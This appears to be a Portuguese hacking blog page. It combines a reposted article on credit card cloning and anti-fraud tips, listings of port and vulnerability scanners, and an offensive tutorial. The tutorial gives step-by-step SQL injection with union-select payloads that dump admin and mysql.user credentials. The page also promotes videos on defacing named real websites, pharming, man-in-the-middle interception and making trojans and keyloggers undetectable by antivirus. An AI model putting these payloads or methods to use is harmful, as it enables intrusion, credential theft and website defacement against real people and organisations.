Ter um cartão de crédito já abre uma nova porta para um perigo quase iminente aos usuários do dinheiro de plástico. Não é novidade que os cartões magnéticos são clonados de maneira grosseira por todos os cantos do país. Entretanto, o prejuízo causado por este tipo de fraude já ultrapassou a casa dos 31 milhões de reais só no primeiro semestre de 2009. Esse valor ainda não atinge grandes quantias se comparado à compra total via cartão de crédito no Brasil, mas já chegou a 1% deste todo.

Os “cartãozeiros”, como são chamados os fraudadores de cartões magnéticos, possuem diversas táticas para fazer com que o dono do cartão caia em um golpe. Há alguns anos, antes da introdução dos cartões com chip no mercado, o índice de clonagens era muito maior. Se ação fosse realizada em um caixa eletrônico em uma agência bancária (o que não é nenhum pouco incomum) os bandidos colocariam o “chupa-cabra” – aparelho usado para copiar as trilhas magnéticas do cartão – no leitor de cartões e, em um lugar um pouco mais alto, filmariam o cliente digitando a senha.

Estes aparelhos que roubam a identificação magnética dos cartões nada mais são do que leitoras comuns alteradas para que passem a gravar estes códigos e reproduzi-los em cartões quaisquer. No entanto, este método é um tanto grosseiro para os padrões tecnológicos que temos hoje. Infelizmente, a tecnologia também chega para auxiliar organizações criminosas e usuários mal intencionados.

Mau uso da tecnologia

Com a chegada dos sites bancários e das funções home-banking, o bandido só precisa encontrar um arquivo espião para fazer com que a senha e o número de cartão de crédito sejam roubados do computador do cliente. Isso acontece muito em casos de emails fraudulentos que se passam por comunicados da Receita Federal, Caixa Econômica Federal e outros bancos brasileiros ou até mesmo do exterior.

O processo de clonagem é mais simples do que muita gente pode imaginar. Porém, exige um arsenal de equipamentos que chegam a custar mais de 10 mil dólares. Nestes casos, o falsário não trabalha com materiais quaisquer e sim com réplicas quase idênticas aos cartões originais das operadoras mais variadas. Para fazer essa falsificação as quadrilhas utilizam impressoras de cartões, máquinas para criação de hologramas, impressão das letras em alto relevo e uma série de outros equipamentos.

Entretanto, esse tipo de quadrilha altamente especializada é mais frequente em países estrangeiros. No Brasil, o que se vê com frequência são as falsificações grosseiras. Muitos bandidos aproveitam dos cartões magnéticos oferecidos em centros de diversão eletrônica de shoppings centers para reproduzir as trilhas magnéticas dos cartões originais.

As compras pela internet têm aumentado sensivelmente os números de fraudes envolvendo cartões de crédito em todo o Brasil. Os mesmos arquivos maliciosos escondidos em emails falsos roubam informações como número do cartão, data de validade e o código de segurança de três dígitos. Com esses dados, qualquer pessoa pode fazer compras no nome de quem quer que seja o dono daqueles dados. Por isso, se você costuma abrir todos os emails que chegam na sua caixa de entrada, comece a ser um pouco mais seletivo e desconfie de remetentes desconhecidos.

Como funciona o golpe

Primeiro de tudo, os bandidos precisam de um aparelho que leia cartões para poder revertê-lo de modo que o dispositivo passe a gravar as trilhas magnéticas que passam pelos seus contatos. Depois, este código é repassado para um segundo cartão que pode, ou não, ter o mesmo aspecto estético do original. O processo de transformação de cartões plásticos comuns em cópias quase fiéis de cartões verdadeiros leva a quadrilha a desembolsar uma boa quantia em dinheiro.

Normalmente estas fraudes não se restringem apenas aos cartões magnéticos. Quem faz falsificações dos cartões também pode fazer cédulas de identidade falsas, CPFs adulterados e uma série de outros documentos cuja confecção de um exemplar falso podem levar à cadeia. A pena para este tipo de crime varia de 1 a 3 anos de prisão (caso o documento falsificado seja particular; ex.: a própria carteira de identidade) ou de 1 a 5 anos, se o documento for público, como é o caso dos cartões de crédito.
Se a quadrilha decidir atuar de maneira direta nos caixas eletrônicos e máquinas de cartão nas lojas a forma de enganar tanto o lojista quanto o consumidor é uma afronta. O bandido se faz passar por um técnico da operadora de cartão de crédito e diz que vai fazer a manutenção da máquina. Na verdade ele instala o “chupa-cabra” para conseguir os dados do cartão.

Cartões com chip: aumento na segurança?

A chegada dos cartões com chip aumentou a segurança dos usuários de serviços de crédito. Essa tecnologia unificou dois cartões em um só e evitar que o cliente ande com um cartão para débito e outro para crédito como acontecia com os cartões magnéticos. Os chips possuem mais memória e fazem com que um único cartão possua as duas opções de pagamento: débito e crédito. Além disso, essa tecnologia conseguiu derrubar os níveis de fraudes em 98% em território francês.

Um dos motivos pelos quais os cartões de chip são tão mais seguros que aqueles de tarja magnética está no fato de que essa nova tecnologia trabalha com autenticação offline, ou seja, não exige que o terminal (caixa eletrônico) esteja conectado com qualquer tipo de sistema além do que já está instalado. Esse tipo de cartão também é mais seguro no que se refere às transações feitas pela internet e dispensa a assinatura do portador, uma vez que o PIN do cartão é capaz de substituir essa necessidade.

A segurança dos chips também está no fato de que todos os dados contidos neste sistema estão criptografados. Entretanto, de nada adianta avançar cada vez mais a tecnologia para garantir a segurança dos usuários se o próprio cliente não toma os devidos cuidados com os seus cartões e documentos. Até mesmo os cartões de ônibus e metrô já passam por situação semelhante. Porém, a técnica para isso é diferente, afinal o sistema de funcionamento desses cartões é baseado em um sistema de Identificação por Frequência de Rádio – a mesma utilizada em etiquetas inteligentes em lojas.

Talvez ainda não exista um método 100% seguro para que as administradoras de cartão de crédito consigam manter os cartões longe dos falsários. Até mesmo o chip já sofre com algumas falsificações, afinal o que houve foi apenas a digitalização do processo que antes era analógico. Mesmo assim, é muito mais seguro fazer uso de cartões de chip do que continuar o uso daqueles que ainda têm a tarja magnética.

Golpes populares e como não ser enganado

Existe milhares de maneiras utilizadas pelos bandidos para conseguir as suas informações sobre números de cartão de crédito. Às vezes é você mesmo quem “entrega o ouro para o bandido”. Alguém liga para a sua casa se identificando como um funcionário da operadora do seu cartão de crédito e informa que foi feita uma compra de um objeto bastante incomum no seu nome com um valor bastante alto.

Ao responder que não, você dará brecha para que o bandido diga que o seu cartão talvez tenha sido clonado e que é preciso fazer uma verificação. Ele pedirá que você informe o seu endereço, número do cartão e o número do PIN. Com esses dados o ladrão poderá fazer compras no seu nome a qualquer hora do dia. Ao final da ligação o suposto atendente pede que você telefone para a central de segurança da operadora do cartão informando o ocorrido.

Contudo, logo depois de desligar o telefone, já existirá uma compra no seu cartão e dessa vez ela é verdadeira e aconteceu por você ter cedido os números de segurança do seu cartão de crédito. Por isso, nunca diga a ninguém informações referentes à sua conta bancária ou cartões de débito ou crédito. Pode ser extremamente perigoso e, sem saber, você pode colaborar com o crime.

Outro golpe bastante difundido é o tão famoso “chupa-cabras”. Como não podemos saber se aquela máquina de pagamentos está ou não adulterada, procure nunca permitir que o atendente leve o cartão para longe da sua vista. Pode parecer um tanto exagerado, mas toda precaução é pouco quando o que está em jogo é manter o seu nome limpo na praça. Por isso, sempre que for realizar pagamentos com o seu dinheiro de plástico, fique atento para qualquer movimentação estranha.

Caso o seu cartão fique preso na máquina da loja ou no caixa eletrônico, procure anular ou cancelar a compra e comunique imediatamente o seu banco. Caso você utilize o telefone da cabine do caixa, verifique se o telefone funciona. Em caso negativo, o golpe é quase certo. Neste caso, não aceite ajuda de nenhum estranho.

Além dessas medidas de segurança, é importante que você se certifique que ninguém está observando enquanto estiver digitando a sua senha. É um direito seu exigir que as outras pessoas aguardem a vez respeitando as faixas marcadas no chão do banco. Dessa maneira você evita dores de cabeça envolvendo a segurança dos cartões e da conta bancária.

E você? Já passou por algo parecido? Conte para a gente e para os outros usuários qual foi a sua experiência! É importante compartilhar essas informações para que o extravio de cartões, roubo de números e senhas seja evitado! Afinal, mais de 31 milhões de reais já foram perdidos em todo o país só nos primeiros seis meses de 2009. Se você tem informações a respeito de alguma quadrilha ou teve seu cartão clonado, informe imediatamente o seu banco e a polícia.

Fique ligado para mais dicas de segurança no InvasãoHacking!

Até a próxima!

Fonte: Baixaki

“Monitore IP, SNMO e NetBIOS numa rede.”

SoftPerfect Network Scanner é um monitorador de IP, SNMP e NetBIOS com várias ferramentas avançadas.

Projetado tanto para administradores como para usuários que se interessam por segurança. O programa executa um ping em computadores, procura por portas TCP que estejam abertas e exibe que tipo de recursos estão compartilhados na rede. Pode trabalhar com portas definidas pelo usuário e resolve hosts captando seu endereço IP local.

Gratuito
Tamanho: 697 KB
Sistema: Windows XP/Vista/98/2000/2003
Empresa: SoftPerfect Research

“Cheque por portas abertas, resolva host names, varra máquinas mortas e muito mais.”

Angry IP Scanner é um escaneador de portas IP extremamente rápido. Ele possui opções variadas como a resolução de host names, checagem de portas abertas, varredura de máquinas mortas, colunas de escaneamento configuráveis, varreduras de múltiplas portas, exportação para vários formatos e suporte a plugins.

Gratuito
Tamanho: 961 KB
Sistema: Windows XP/98/2000
Empresa: Angryziber Software

Considere o Sandcat um NMap especializado em varrer servidores web (como IIS ou Apache) e aplicações web (o seu site!). Isso facilita muito, pois você pode testar um determinado site ou servidor procurando por vários tipos de falhas como SQL Injection, Blind SQL Injection, XSS, XPath Injection, etc.
Ela é gratuita para ser utilizada e bem completa (bem próxima do nível do Web Vulnerability Scanner, da Acunetix). Ele checa por, aproximadamente, 260 vulnerabilidades conhecidas (utilizando o ranking de várias entidades como OWASP, OWASP PHP, CVE, CWE, etc), detecta falhas de XSS (Cross Site Scripting), testas sistemas IDS, consegue explorar sistemas web desenvolvidos utilizando AJAX, descobre e analisa a configuração utilizada no servidor automaticamente para descobrir quais testes são necessários, etc.

E Necessário se cadastrar no site para poder baixar o programa.

Autor: Diablos 4-Ever

Neste tutorial é feito uma descrição de como utilizar o Sql Injection para obter algumas informações.

Primeiramente: O que é Sql Injection?

É uma das vulnerabilidade mais comuns atualmente. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site obtendo, assim, informações confidenciais.

1 – Sql Injection (clássico ou baseado em erros).

Medidas adotadas para explorar a vulnerabilidade.

A) Verificar a Vulnerabilidade.

Abaixo um exemplo qualquer para análise da vulnerabilidade. O link fictício mostra uma página qualquer de um site, imaginemos que seja uma página de um fórum hacker lixo de invasão.

http://www.site.com/news.php?id=5

Para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( ‘ ). Abaixo é mostrado a forma como a url ficará.
http://www.site.com/news.php?id=5'

Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the...

O erro acima diz que você possui um erro na síntaxe da consulta Sql e pede para você checar o manual correspondente ao SGBD que você está utilizando. “Até parece que você é o administrador do site”

Agora que checamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Iremos ao passo seguinte.

B) – Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.

Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY.

Mas como utilizar este comando Sql?

Simples! Ao final da url você adiciona o comando order by e vai adicionando uma sequência de Colunas/Tabelas, ou seja, você pode acionar a coluna correspondente. Caso queira olhar a coluna 1, ordene assim:
http://www.site.com/news.php?id=5 order by 1

Se não aparecer nenhum erro é por que esta Coluna/Tabela número 1 existe. Lembre-se que esta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro dizendo que a Coluna/Tabela é inexistente no banco de dados.
http://www.site.com/news.php?id=5 order by 1/* <-- Sem erro

http://www.site.com/news.php?id=5 order by 2/* <-- Sem erro

http://www.site.com/news.php?id=5 order by 3/* <-- Sem erro

http://www.site.com/news.php?id=5 order by 4 <-- Com erro

O exemplo acima, é atribuido Colunas/Tabelas (1..2..3..4), no entanto, é mencionado erro na Coluna/Tabela 4. Conclui-se então que esta Coluna/Tabela é inexistente e que o banco possui apenas 3 Colunas/Tabelas.

C) – Utilizando a função UNION.

Esta função poderosa é responsável por unir vários dados localizados em Colunas/Tabelas diferentes. “Que massa hem!”

Vamos utilizar o exemplo abaixo para melhor exemplificar.
http://www.site.com/news.php?id=5 union all select 1,2,3

Explicando a Sql:
O exemplo acima vai possibilitar ao “Injectador” visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.
...?id ... union all select 1,2,3

Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.site.com/news.php. Está e a ordem que você atribui ao comando colocado na url do site.

D) – Descobrindo a versão do SGBD (MySql).
http://www.site.com/news.php?id=5 union all select 1,2,3

Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes no banco. Agora para visualizar a versão do banco é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.
http://www.site.com/news.php?id=5 union all select 1,@@version,3

Caso não der certo, você receberá uma mensagem de erro semelhante a esta:
"union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

Para resolver este erro necessitamos utilizar a função convert(). Exemplo abaixo:
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/

Ou então as funções hex() e unhex();
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/

Com os procedimentos acima, você irá conseguir achar a versão do SGBD MySql.

E) – Obtendo o nome da Coluna/Tabela.

Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:

Geralmente os DBA’s (Administradores de Banco de Dados) utilizam nomes comuns como padronização para suas Colunas/Tabelas como:
user, usuario, admin, member, membro, password, passwd, pwd, user_name

Lógico que isto depende bastante de DBA’s e qual tipo de padronização ele estiver utilizando.

Na consulta abaixo o “Injectador” bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin

Observe que acima a query diz: “Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do usuário admin”.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin

Caso apareça erro, vá mudando o nome da coluna… afinal é a técnica da tentativa e erro.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/

Acima, observe que a consulta começa a ficar refinada: “Mostre-me os valores Coluna/Tabelas 1, o nome do usuário e 3 do usuário admin”. Ou seja, suponha que o DBA tenha criado um banco onde as ele separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.
http://www.site.com/news.php?id=5 union all select 1,username, password from admin

Caso a consulta der certo, na tela aparecerá o nome do usuário e a senha. Esta senha aparecerá na tela tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvido o banco.

Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Dependendo do campo, fica a seu critério inserir em hexadecimal (0×3a) ou utilizando o padrão Ascii (char(58)).
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Na tela já aparecerá os valores com o nome do usuário administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra..

Dica: Quando está difícil para achar o nome da Coluna/Tabela, sempre é bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

F) – MySql 5.

Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.

Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas do banco. É este arquivo que será o nosso alvo.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.

Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.

Observe abaixo que é colocado como limite 0, 1.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Dica: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de você, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então você deveria acrescentar uma por uma até achar… 1, 2; …, …; 42, 43.

Espero que tenham entendido esta parte.

Para obter o nome das colunas, também é utilizado a mesma lógica. Só que agora no arquivo information_schema.columns.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos usuário pode-se fazer a consulta abaixo:
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/

Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de usuários.

Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

Acima simplesmente pedimos para mostrar o usuário, a senha e o email.
example: admin:hash:whatever@blabla.com

Isto é um exemplo de Sql Injection. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql.

Autor: Marezzi (Inglês)

O Defacement (ou simplesmente deface) é um termo de origem inglesa para o ato de modificar ou danificar a superfície ou aparência de algum objeto e é empregado comumente na Segurança da informação para categorizar os ataques realizados por defacers e script kiddies para modificar a página de um sítio na Internet.

Geralmente os ataques tem cunho político, objetivando disseminar uma mensagem do autor do ataque para os frequentadores do site alvo. Esses ataques podem também ter cunho pessoal, transformando-se em uma espécie de troféu para o autor — um prêmio pela sua capacidade de penetrar na segurança de um determinado sistema.

O ato pode ser analogamente comparado à pichação de muros e paredes. O autor do defacement geralmente é referenciado como defacer ou também pichador.

Grupos de Defacement são normalmente formados por crackers iniciantes entre 14 e 22 anos, em sua maioria tentando provar que tem capacidade e ser reconhecido pelos crackers.

Teem como alvo principal sites de governos e prefeituras de cidades.

Descrição do Vídeo: Nele é mostrado explorando SQL Injection, injetando códigos na query e fazendo consultas no banco de dados onde consigo login e senha dos ” Administradores” tendo acesso ao Xpanel onde consigo fazer upload da Shell e desfigurando o site.

Sites atacados: www.ufo.com.br , www.pdt.org.br

Autor: B4silisco.

Fonte: invasão

Faça o Download desse vídeo clicando Aqui !!

Ela te dá a possibilidade de interceptar, armezenar em log e modificar o tráfico web em tempo real. Assista a nossa video aula praticando a técnica Man in the middle utilizando o achilles.

Gratuito
Tamanho: 423 KB
Sistema: Windows XP, Windows 2003, Windows Vista 32 Bits
Empresa: Achilles

Nesta video aula estaremos mostrando um pouco da técnica Pharming.

O que e Pharming? Em informática Pharming é o termo atribuído ao ataque baseado na técnica DNS cache poisoning (envenenamento de cache DNS) que, consiste em corromper o DNS (Sistema de Nomes de Domínio ou Domain Name System) em uma rede de computadores, fazendo com que a URL (Uniform Resource Locator ou Localizador Uniforme de Recursos) de um site passe a apontar para um servidor diferente do original.

Ao digitar a URL (endereço) do site que deseja acessar, um banco por exemplo, o servidor DNS converte o endereço em um número IP, correspondente ao do servidor do banco. Se o servidor DNS estiver vulnerável a um ataque de Pharming, o endereço poderá apontar para uma página falsa hospedada em outro servidor com outro endereço IP, que esteja sob controle de um golpista.

Os golpistas geralmente copiam fielmente as páginas das instituições, criando a falsa impressão que o usuário está no site desejado e induzindo-o a fornecer seus dados privados como login ou números de contas e senha que serão armazenados pelo servidor falso.

Para assistir o vídeo: Clique Aqui

Autor: Fernando (DarkShadow)

Nesta video aula vamos ensinar como deichar seu trojan/Keylogger ou qualquer outro malware  feito em delphi Indetectavel. O importante e ter o source do trojan ou keylogger para poder deixalos indetectaveis pelos antivirus. Não tem o source? Não se preocupe! Ainda não temos no site mas vamos postar varios essa semana

Para assistir o vídeo: Clique Aqui

Autor: R0dr1g0